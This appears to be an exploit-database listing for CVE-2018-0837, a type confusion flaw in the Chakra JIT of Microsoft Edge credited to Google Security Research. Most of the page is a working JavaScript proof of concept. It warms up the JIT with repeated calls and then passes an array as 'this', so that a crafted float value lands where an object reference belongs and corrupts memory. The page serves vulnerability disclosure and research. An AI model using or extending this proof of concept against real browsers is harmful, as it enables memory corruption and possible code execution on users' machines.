Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
| EKU-ID: 7379 | CVE: 2018-0837 | OSVDB-ID: |
| Author: Google Security Research | Published: 2018-02-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 7379 | CVE: 2018-0837 | OSVDB-ID: |
| Author: Google Security Research | Published: 2018-02-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.
PoC:
*/
function opt(arr) {
arr[0] = 1.1;
this[0] = {};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt.call({}, arr);
}
opt.call(arr, arr);
print(arr);
}
main();